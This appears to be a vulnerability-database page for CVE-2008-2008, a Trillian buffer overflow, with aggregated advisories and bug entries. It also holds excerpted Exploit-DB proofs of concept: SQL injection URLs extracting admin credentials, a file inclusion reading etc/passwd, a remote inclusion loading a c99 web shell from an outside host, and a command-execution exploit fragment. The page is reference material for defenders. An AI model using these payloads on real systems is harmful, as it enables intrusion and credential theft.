CVE-2008-2008
Published 2008-04-29. CVE-2008-2008: Buffer overflow in the Display Names message feature in Cerulean Studios Trillian Basic and Pro 3.1.9.0 allows remote attackers to cause a denial of service…
Priority P3 (37) · critical · CVSS 2.0: 9.3 · AV:N/AC:M/Au:N/C:C/I:C/A:C
EPSS: 4.09% (89.5th percentile)
Buffer overflow in the Display Names message feature in Cerulean Studios Trillian Basic and Pro 3.1.9.0 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long nickname in an MSN protocol message.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cerulean_studios | trillian | — | — |
CVSS provenance
nvd · v2.0 · 9.3 CRITICAL · AV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat · 9.3 CRITICAL
vendor_cisco · 9.0 CRITICAL
GHSA
GHSA-24wh-gwj5-gmw5 · ghsa_unreviewed · 2022-05-01 · CVE-2008-2008 [HIGH] CWE-119
Buffer overflow in the Display Names message feature in Cerulean Studios Trillian Basic and Pro 3.1.9.0 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long nickname in an MSN protocol message.
Red Hat: CVE-2008-5508 [MEDIUM] Firefox errors parsing URLs with control characters · vendor_redhat · 2008-12-16 · CVSS 4.3
Mozilla Firefox 3.x before 3.0.5 and 2.x before 2.0.0.19, Thunderbird 2.x before 2.0.0.19, and SeaMonkey 1.x before 1.1.14 does not properly parse URLs with leading whitespace or control characters, which might allow remote attackers to misrepresent URLs and simplify phishing attacks.
Red Hat: CVE-2008-4775 [MEDIUM] CWE-79 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled · vendor_redhat · 2008-10-27 · CVSS 6.8
Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin 3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977.
Red Hat: CVE-2008-2937 [LOW] postfix improper mailbox permissions · vendor_redhat · 2008-08-14 · CVSS 1.9
Postfix 2.5 before 2.5.4 and 2.6 before 2.6-20080814 delivers to a mailbox file even when this file is not owned by the recipient, which allows local users to read e-mail messages by creating a mailbox file corresponding to another user's account name.
Package: postfix (Red Hat Enterprise Linux 6) - Not affected
Red Hat: CVE-2008-0598 [MEDIUM] kernel: linux x86_64 ia32 emulation leaks uninitialized data · vendor_redhat · 2008-06-25 · CVSS 4.9
Unspecified vulnerability in the 32-bit and 64-bit emulation in the Linux kernel 2.6.9, 2.6.18, and probably other versions allows local users to read uninitialized memory via unknown vectors involving a crafted binary.
Cisco: CVE-2008-2053 [CRITICAL] CWE-264 Cisco Voice Portal Privilege Escalation Vulnerability · vendor_cisco · 2008-05-21 · CVSS 9.0
A vulnerability exists in the Cisco Unified Customer Voice Portal (CVP)
where an authenticated user can create, modify, or delete a superuser account.
Cisco has released software updates that address this vulnerability.
This advisory is posted at
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20080521-cvp.
Red Hat: CVE-2008-7271 [MEDIUM] CWE-79 eclipse: Help Content web application vulnerable to multiple XSS flaws · vendor_redhat · 2008-04-24 · CVSS 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE, possibly 3.3.2, allow remote attackers to inject arbitrary web script or HTML via (1) the searchWord parameter to help/advanced/searchView.jsp or (2) the workingSet parameter in an add action to help/advanced/workingSetManager.jsp, a different issue than CVE-2010-4647.
Package: eclipse (Red Hat Enterprise Linux 5) - Will not fix
Package: eclipse (Red Hat Enterprise Linux 6) - Not affected
Red Hat: CVE-2008-0413 [CRITICAL] Mozilla javascript engine crashes · vendor_redhat · 2008-02-07 · CVSS 9.3
The JavaScript engine in Mozilla Firefox before 2.0.0.12, Thunderbird before 2.0.0.12, and SeaMonkey before 1.1.8 allows remote attackers to cause a denial of service (crash) and possibly trigger memory corruption via (1) a large switch statement, (2) certain uses of watch and eval, (3) certain uses of the mousedown event listener, and other vectors.
Red Hat: CVE-2008-0005 [MEDIUM] CWE-79 mod_proxy_ftp XSS · vendor_redhat · 2008-01-02 · CVSS 4.3
mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
Cisco: CVE-2008-1154 Cisco Unified Communications Disaster Recovery Framework Command Execution Vulnerability · vendor_cisco
Several products in the Cisco Unified Communications family of products contain a command execution vulnerability in the Disaster Recovery Framework (DRF) feature. A remote, unauthenticated user could exploit this vulnerability to execute arbitrary commands that may allow full administrative access to affected systems. There is a workaround for this vulnerability. Cisco has released software updates that address this vulnerability. This advisory is posted at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20080403-drf.
CWE: CWE-94
Bug IDs: CSCso53771
No detection rules found.
Exploit-DB: CVE-2009-1236 Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC) · exploitdb · 2009-03-23
---
/* xnu-appletalk-zip.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int
main (int argc, char **argv)
{
struct sockaddr_at daddr, saddr;
char *p, buf[1024];
int fd, zlen;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc [src addr]\n", argv[0]);
exit (EXIT_FAILURE);
}
if (!atalk_aton (argv[1], &daddr.sat_addr))
{
fprintf (stderr, "* dst address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
if (argc > 3)
{
if (!atalk_aton (argv[3], &saddr.sat_addr))
{
fprintf (stderr, "* src address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
}
daddr.sat_family = AF_APPLET
Exploit-DB: CVE-2008-5811 Joomla! Component PAX Gallery 0.1 - Blind SQL Injection · exploitdb · 2008-12-28
---
[■] Joomla Component PAX Gallery v 0.1 (gid) --------------------------------------- AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> Note: safe mode = ON
> Autor script: Tobias Floery
>---------------------------------------Version:
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=5 [Ye$]
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=4 [Noo]
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20ascii(substring((select%20password%20from%20jos_users%20limit%201,1),1,1))%3E100
d8e
Exploit-DB: CVE-2008-4881 YourFreeWorld Reminder Service - SQL Injection · exploitdb · 2008-11-01
---
Reminder Service ( id ) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.yourfreeworld.com/script/reminder.php
DorK : inurl:tr.php?id= Reminder Service
Exploit :
tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
Demo :
http://www.downlinegoldmine.com/reminderservice/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
Greetz : All my friends
# milw0rm.com [2008-11-01]
Exploit-DB: CVE-2008-5323 Wysi Wiki Wyg 1.0 - Local File Inclusion / Cross-Site Scripting / PHPInfo · exploitdb · 2008-10-20
---
/*
Wysi Wiki Wyg 1.0 (LFI,XSS,PHPInfo) Remote Vulnerabilities
By StAkeR[at]hotmail[dot]it
http://www.easy-script.com/scripts-dl/wysiwikiwyg10.zip
1- PHPInfo Disclosure
- index.php?categup=isset
2- Local File Inclusion (LFI) (MQ Off)
- index.php?c=../../../&a=etc/passwd%00
3- Cross Site Scripting (XSS)
- index.php?c=wikiwizi&a=recherche&s=[Javascript]
*/
# milw0rm.com [2008-10-20]
Exploit-DB: CVE-2008-4167 Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user · exploitdb · 2008-09-11
---
#----------------------------------------------------------------
#
#Script : Ezphotogallery 2.1
#
#Type : Vulnerabilities ( Add Admin user/Remove user)
#
#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="
#
#----------------------------------------------------------------
#
#Discovered by : Stack
#
#----------------------------------------------------------------
#
#Script Download : http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
#
#----------------------------------------------------------------
Exploit :
http://site.il/useradmin.php
how to use exploit
in Add user select
Simple example by Stack user :d :d
Add user
Name: Stack
Password: passstack
E-mail: Stack@h
Exploit-DB: CVE-2008-4470 Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow · exploitdb · 2008-09-06
---
/*Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow
This sploit launches calc.exe .. classical buffer overflow, a 500 byte buffer is causing the exception.
Tested on WinXP Pro sp3,compiled with DEv-C++ 4.9.9.2.
After preparation:
|Access violation when executing [58414158]|
EAX 00000001
ECX 004C01B2 cue_tria.004C01B2
EDX 01030608
EBX 0309948D ASCII "I:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 0013EC98 ASCII "eeeeeeeeeeeeeeeeeeeeeeeeeeeYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYr Of The Dog Again (2006)[T-Boyz]\13.
Exploit-DB: CVE-2008-4091 Web Directory Script 1.5.3 - 'site' SQL Injection · exploitdb · 2008-08-31
---
|___________________________________________________|
|
| Web directory script v1.5.3 (site) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script : http://sourceworkshop.com/advanced_scripts/web_directory_script.html
|
| DorK : "Powered by web directory script"
|___________________________________________________|
Exploit:
www.[target].com/Script/index.php?command=open&site=-7+union+select+concat_ws(user(),version(),database())--
L!VE DEMO:
http://links.sourcew
Exploit-DB: CVE-2008-5755 IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (2) · exploitdb · 2008-07-21
---
#!/usr/bin/perl
# k`sOSe - 7/21/2008
# http://secunia.com/advisories/20172
# A sploit for an ancient vuln. Just because i need
# to improve my skills on windows exploitation.
use warnings;
use strict;
# CMD="c:\windows\system32\calc.exe"
# [*] x86/alpha_mixed succeeded, final size 345
# bad char -> \x89
Exploit-DB: CVE-2008-3152 SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1) · exploitdb · 2008-07-07
---
+---------------------------------------+
| Blind SQL Injection Vulnerability |
| in Pay Per Click Script |
| found by Hamtaro aka CorVu5 |
|there must be 50 ways to learn to hover|
+---------------------------------------+
#gdork: "Pay Per Click Script powered by SmartPPC.com."
#vuln: site.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108
#login: site.com/accounts.php
greetz Hamtaro aka CorVu5
# milw0rm.com [2008-07-07]
Exploit-DB: CVE-2008-2890 Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection · exploitdb · 2008-06-21
---
-[*]+================================================================================+[*]-
-[*]+ OFFL <= 0.2.6 Remote SQL Injection Vulnerability +[*]-
-[*]+================================================================================+[*]-
[*] Discovered By: t0pP8uZz
[*] Discovered On: 19 JUNE 2008
[*] Script Download: http://downloads.sourceforge.net/offl
[*] DORK: N/A
[*] Vendor Has Not Been Notified!
[*] DESCRIPTION:
OFFL 0.2.6 and prior versions suffer from multiple insecure mysql queries.
SQL Injections below, there are various other spots which are injectable too...
including " leagues.php?league_id=1' ", " players.php?player_id=190' "
[*] SQL Injection:
For Admin: http://site.com/teams.php?f
Exploit-DB: CVE-2008-2822 3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal · exploitdb · 2008-06-16
---
source: https://www.securityfocus.com/bid/29749/info
3D-FTP is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Exploiting these issues allows an attacker to write arbitrary files to locations outside of the FTP client's current directory. This could help the attacker launch further attacks.
3D-FTP 8.01 is vulnerable; other versions may also be affected.
The following example responses are available:
Response to LIST (backslash):
-rw-r--r-- 1 ftp ftp 20 Mar 01 05:37 \..\..\..\..\..\..\..\..\..\testfile.txt\r\n
Response to LIST (forward-slash):
-rw-r--r-- 1 ftp ftp 20 Mar 01 05:37 /../../../../../../../../../testfile.txt\r\n
Response to LIST (combination):
-
Exploit-DB: CVE-2008-2841 XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7) · exploitdb · 2008-06-13
---
##################################################################################################################
#
# Xchat
Welcome to my personal website
document.location='ircs://[email protected]" --command "shell calc"'
# milw0rm.com [2008-06-13]
Exploit-DB: CVE-2008-4193 Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC) · exploitdb · 2008-06-01
---
##################################################################################################################
# SecurityGateway 1.0.1 Remote Buffer Overflow ( username)
# Vendor: http://www.altn.com/
# risk : critical
#SecurityGateway opens port 4000 for remote administration/management, EIP gets owned when the username field is filled with 720 chars
#
#eax=00000000 ebx=00000000 ecx=63636363 edx=7c9137d8 esi=00000000 edi=00000000
#eip=63636363 esp=042ce910 ebp=042ce930 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
#63636363 ?? ???
#
# Replace http://127.0.0.1:4000/ with your remote host.
use LWP::UserAgent;
$connect = LWP::UserAgent->new;
my $payload1 ="a" x 236;
my
Exploit-DB: CVE-2008-2334 philboard 0.5 - 'W1L3D4_konuoku.asp?id' SQL Injection · exploitdb · 2008-05-14
---
source: https://www.securityfocus.com/bid/29229/info
Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Philboard 0.5 is vulnerable; other versions may also be affected.
http://www.example.com:2222/lab/philboard_v5/W1L3D4_konuoku.asp?id=1+union+select+0,1,2,3,4,5,6,1,1,1,1,1,1,1,7,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,8,9,1,1,1,1,1,1,1,1,1,1+from+users
Exploit-DB: CVE-2008-1774 Pligg CMS 9.9.0 - 'editlink.php' SQL Injection · exploitdb · 2008-04-08
---
Hello,
the Pligg (http://www.pligg.com/) content management system is prone to
an SQL-injection vulnerability because it fails to sufficiently sanitize
user-supplied data before using it in an SQL query:
editlink.php?id=1+AND+((SELECT+user_pass+FROM+pligg_users+WHERE+user_login=0x676f64)+LIKE+0x25)+UNION+SELECT+10,2
To exploit this you need the id of a news you submitted(10 in the
example) and an id of a news submitted by others(1 in the example).
When the LIKE statement matches you get a "Not your link" error.
Guido Landi
# milw0rm.com [2008-04-08]
Exploit-DB: CVE-2008-7145 PHPAddressBook 2.0 - 'index.php' SQL Injection · exploitdb · 2008-03-26
---
source: https://www.securityfocus.com/bid/28456/info
phpAddressBook is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpAddressBook 2.0 is vulnerable; other versions may also be affected.
The following proof of concept is available:
login:admin ' or 1=1/*
password:[blank]
Exploit-DB: CVE-2008-0647 Ourgame GLWorld 2.x - 'hgs_startNotify()' ActiveX Buffer Overflow · exploitdb · 2008-02-19
---
# milw0rm.com [2008-02-19]
Exploit-DB: CVE-2008-0691 WordPress Plugin WP-Footnotes 2.2 - Multiple Remote Vulnerabilities · exploitdb · 2008-02-02
---
source: https://www.securityfocus.com/bid/27572/info
WP-Footnotes plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. The plugin also insecurely exposes administrative functionality.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects WP-Footnotes 2.2; other versions may also be vulnerable.
http://www.example.com/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[priorit
Exploit-DB: CVE-2008-0442 Small Axe 0.3.1 - 'cfile' Remote File Inclusion · exploitdb · 2008-01-18
---
# Name : Small Axe Weblog 0.3.1 Remote File Include
# Download From : http://releases.smallaxesolutions.com/smallaxe-0.3.1.zip
# Found By : RoMaNcYxHaCkEr We Are H-T TeaM (Houssamix - ToXiC)
# Home Page : Not Yet :( Tryag.cc/cc No-Hack.net V99x.com/vb Hackteach.org/cc
# Vulne Code In File linkbar.php In Line 1 :
include_once($cfile);
# Exploit :
http://Www.RxH.CoM/smallaxe-0.3.1/inc/linkbar.php?cfile=http://no-hack.net/shells/c99.txt?
That,s It,s
Good Luck Everybody
# Greet To :
"Cold Z3ro My Master , !!Hack-back!!" (Hackteach.org)
Tryag TeaM :"Mahmood_ali , cRMINEL_NET , Mohajer22 , Dr-Ha!l , LoVeRs Hacker , Abdullah00 , Athabi Ker , Mr-Wolf ...etc" (Tryag.com)
Hack15 TeaM :"GeNiUs-HaCkEr , Mr-AljoOOker , Mr-Shares , So9or
Exploit-DB: CVE-2008-0382 MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution · exploitdb · 2008-01-16
---
#!/usr/bin/php -q -d short_open_tag=on
'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$sql = "forumdisplay.php?fid=$fid&sortby=']=1;echo%20'*';%20system('$cmd');echo%20'*';%20\$orderarrow['";
$packet ="GET " . $path . $sql . " HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("*",$html);
$temp2=explode("*",$temp[1]);
print "-------------------------------------------------------------------------\r\n";
print " MyBB
# milw0rm.com [2008-01-16]
Exploit-DB: CVE-2008-0244 SAP MaxDB 7.6.03.07 - Remote Command Execution · exploitdb · 2008-01-09
---
#######################################################################
Luigi Auriemma
Application: SAP MaxDB
https://www.sdn.sap.com/irj/sdn/maxdb
http://www.sap.com
Versions: <= 7.6.03 build 007
Platforms: Windows, Linux and Solaris
Bug: pre-auth remote commands execution
Exploitation: remote
Date: 09 Jan 2008
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
1) Introduction
SAP MaxDB is a commercial and widely known and used database.
#######################################################################
2) Bug
The Ma
Bugzilla: CVE-2008-5824 [MEDIUM] audiofile: heap-based overflow in Microsoft ADPCM compression module (app crash, arb. code execution) [Fdevel] · bugzilla · 2009-01-30 · CVSS 6.8
Fdevel tracking bug: see blocks bug list for full details of the security issue(s).
[bug automatically created by: add-tracking-bugs]
Discussion:
This bug appears to have been reported against 'rawhide' during the Fedora 11 development cycle.
Changing version to '11'.
More information and reason for this action is here:
http://fedoraproject.org/wiki/BugZappers/HouseKeeping
---
This message is a reminder that Fedora 11 is nearing its end of life.
Approximately 30 (thirty) days from now Fedora will stop maintaining
and issuing updates for Fedora 11. It is Fedora's policy to close all
bug reports from releases that are no longer maintained. At that time
this bug
Bugzilla: CVE-2008-5077 [MEDIUM] OpenSSL Incorrect checks for malformed signatures · bugzilla · 2008-12-16 · CVSS 5.8
Draft advisory from OpenSSL team:
OpenSSL Security Advisory [07-Jan-2009]
Incorrect checks for malformed signatures
Several functions inside OpenSSL incorrectly checked the result after
calling the EVP_VerifyFinal function, allowing a malformed signature
to be treated as a good signature rather than as an error. This issue
affected the signature checks on DSA and ECDSA keys used with
SSL/TLS.
One way to exploit this flaw would be for a remote attacker who is in
control of a malicious server or who can use a 'man in the middle'
attack to present a malformed SSL/TLS signature from a certificate chain
to a vulnerable client, bypassing validation.
This vulnerability is tracked as CVE-2008-5077.
The OpenSSL security team wou
Bugzilla: CVE-2008-4456 [LOW] mysql: mysql command line client XSS flaw · bugzilla · 2008-10-10 · CVSS 2.6
Cross-site scripting (XSS) vulnerability in the command-line client in MySQL 5.0.26 through 5.0.45, when the --html option is enabled, allows attackers to inject arbitrary web script or HTML by placing it in a database cell, which might be accessed by this client when composing an HTML document.
http://www.securityfocus.com/archive/1/archive/1/496842/100/0/threaded
http://www.securityfocus.com/archive/1/archive/1/496877/100/0/threaded
http://www.henlich.de/it-security/mysql-command-line-client-html-injection-vulnerability
http://bugs.mysql.com/bug.php?id=27884
http://secunia.com/advisories/32072
Discussion:
The issue has been rated as having low security impact, as this can only be a security flaw when all following conditions are
Bugzilla: CVE-2008-3964 [MEDIUM] libpng: off-by-one error in png_push_read_zTXt() · bugzilla · 2008-09-09 · CVSS 4.3
libpng upstream version 1.2.32beta01 fixes an insufficient memory allocation flaw in the "png_push_read_zTXt()" function in pngpread.c, which results in a write of one null byte past the end of the allocated buffer.
References:
http://sourceforge.net/project/shownotes.php?release_id=624518
http://www.openwall.com/lists/oss-security/2008/09/09/3
Upstream bug report:
http://sourceforge.net/tracker/index.php?func=detail&aid=2095669&group_id=5624&atid=105624
As noted in the upstream bug report, this issue was introduced upstream in libpng-1.2.30beta04 and currently only affects 1.2.31 as available in Fedora Rawhide. Versions of libpng as shipped in Red Hat Enterprise Linux 2.1, 3, 4 and 5 are not affected by this flaw.
Discussion:
Bugzilla: CVE-2008-3699 [LOW] amarok: temporary file vulnerability via symlink attacks (priv esc) · bugzilla · 2008-08-14 · CVSS 3.3
Description of problem:
The "MagnatuneBrowser::listDownloadComplete()" function in Amarok 1.4.9.1
and prior versions handles temporary files in an insecure manner. This flaw
can be used by a malicious unprivileged user via symlink attack in combination
with a race condition to overwrite arbitrary files with the privileges of the user running the application (potential privilege escalation).
Version-Release number of selected component (if applicable):
1.4.9.1 and prior versions.
How reproducible:
No reproducer
Proposed patch:
http://websvn.kde.org/?view=rev&revision=846626
Public mentions of this issue:
http://secunia.com/advisories/31418/
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=494765
http:
Bugzilla: CVE-2008-3381 [MEDIUM] moin: XSS issue in the advanced search form · bugzilla · 2008-07-31 · CVSS 4.3
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-3381 to the
following vulnerability:
Multiple cross-site scripting (XSS) vulnerabilities in
macro/AdvancedSearch.py in moin (and MoinMoin) 1.6.3 and 1.7.0 allow
remote attackers to inject arbitrary web script or HTML via
unspecified vectors.
Upstream patches (1.6 and 1.7 branches):
http://hg.moinmo.in/moin/1.6/rev/8686a10f1f58
http://hg.moinmo.in/moin/1.7/rev/383196922b03
References:
http://moinmo.in/SecurityFixes#moin1.6.3
http://secunia.com/advisories/31135
Discussion:
There's no MoinMoin/macro/AdvancedSearch.py in moin 1.5.9 in F-8, so it's
probably unaffected.
---
moin-1.6.4-1.fc10 has been submitted as an update for Fedora 10.
http://admin.fedoraprojec
Bugzilla: CVE-2008-1928 [MEDIUM] perl-Imager: buffer overflow when using an image based fill on a double precision image · bugzilla · 2008-04-24 · CVSS 5.0
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-1928 to the following vulnerability:
Buffer overflow in Imager 0.42 through 0.63 allows attackers to cause
a denial of service (crash) via an image based fill in which the
number of input channels is different from the number of output
channels.
References:
http://rt.cpan.org/Public/Bug/Display.html?id=35324
Discussion:
perl-Imager-0.64-2.fc8 has been pushed to the Fedora 8 stable repository. If problems still persist, please make note of it in this bug report.
---
perl-Imager-0.64-2.fc7 has been submitted as an update for Fedora 7
---
perl-Imager-0.64-2.fc7 has been pushed to the Fedora 7 stable repository. If p
Bugzilla: CVE-2008-1654 [MEDIUM] Flash Player cross domain HTTP header flaw · bugzilla · 2008-04-04 · CVSS 4.3
Adobe Flash Player 9.0.124.0 adds a new feature to perform a cross-domain policy
file check before allowing a SWF file to send HTTP headers to a different domain.
Discussion:
Public now via:
http://www.adobe.com/support/security/bulletins/apsb08-11.html
Lifting embargo.
---
This issue was addressed in:
Red Hat Enterprise Linux Extras:
http://rhn.redhat.com/errata/RHSA-2008-0221.html
Bugzilla: CVE-2008-1367 [HIGH] Kernel doesn't clear DF for signal handlers · bugzilla · 2008-03-13 · CVSS 7.5
Description of problem:
Jake Edge has reported the following gcc kernel related potential
security issue on LWN:
A change to GCC for a recent release coupled with a kernel bug has created a
messy situation, with possible security implications. GCC changed some
assumptions about x86 processor flags, in accordance with the ABI standard, that
can lead to memory corruption for programs built with GCC 4.3.0. No one has come
up with a way to exploit the flaw, at least yet, but it clearly is a problem
that needs to be addressed.
The problem revolves around the x86 direction flag (DF), which governs whether
block memory operations operate forward through memory or backwards. The main
use for the flag is to support overlapping memory co
Bugzilla: CVE-2008-0591 [MEDIUM] Mozilla information disclosure flaw · bugzilla · 2008-02-06 · CVSS 4.3
CVE-2008-0591 describes an information disclosure bug in the Mozilla
products. It is possible that this flaw could be used by malicious web
content to trick a user into allowing the site to steal information about a
users browsing session.
Discussion:
seamonkey-1.1.8-1.fc7 has been submitted as an update for Fedora 7
---
seamonkey-1.1.8-1.fc8 has been submitted as an update for Fedora 8
---
blam-1.8.3-13.fc8,chmsee-1.0.0-1.28.fc8,devhelp-0.16.1-5.fc8,epiphany-2.20.2-3.fc8,epiphany-extensions-2.20.1-5.fc8,firefox-2.0.0.12-1.fc8,galeon-2.0.4-1.fc8.2,gnome-python2-extras-2.19.1-12.fc8,gnome-web-photo-0.3-8.fc8,gtkmozembedmm-1.4.2.cvs20060817-18.fc8,kazehakase-0.5.2-1.fc8.2,liferea-1.4.11-2.fc8,Miro-1.1-3.fc8,openvrml-0.17.5-2.fc8,ruby-g
Krebs: CVE-2019-0708 [CRITICAL] Microsoft Patches ‘Wormable’ Flaw in Windows XP, 7 and Windows 2003 · blogs_krebs · 2019-05-14 · CVSS 9.8
Microsoft today is taking the unusual step of releasing security updates for unsupported but still widely-used Windows operating systems like XP and Windows 2003, citing the discovery of a “wormable” flaw that the company says could be used to fuel a fast-moving malware threat like the WannaCry ransomware attacks of 2017.
The May 2017 global malware epidemic WannaCry affected some 200,000 Windows systems in 150 countries. Source: Wikipedia.
The vulnerability (CVE-2019-0708) resides in the “remote desktop services” component built into supported versions of Windows, including Windows 7, Windows Server 2008 R2, and Windows Server 2008. It also is present in computers powered by Windows XP and Windows 2003, operating systems for which Microsoft long ago stopped shipping security updat
References:
http://secunia.com/advisories/29952
http://securityreason.com/securityalert/3849
http://www.securityfocus.com/archive/1/491281/100/0/threaded
http://www.securityfocus.com/bid/28925
http://www.vupen.com/english/advisories/2008/1368/references
Published: 2008-04-29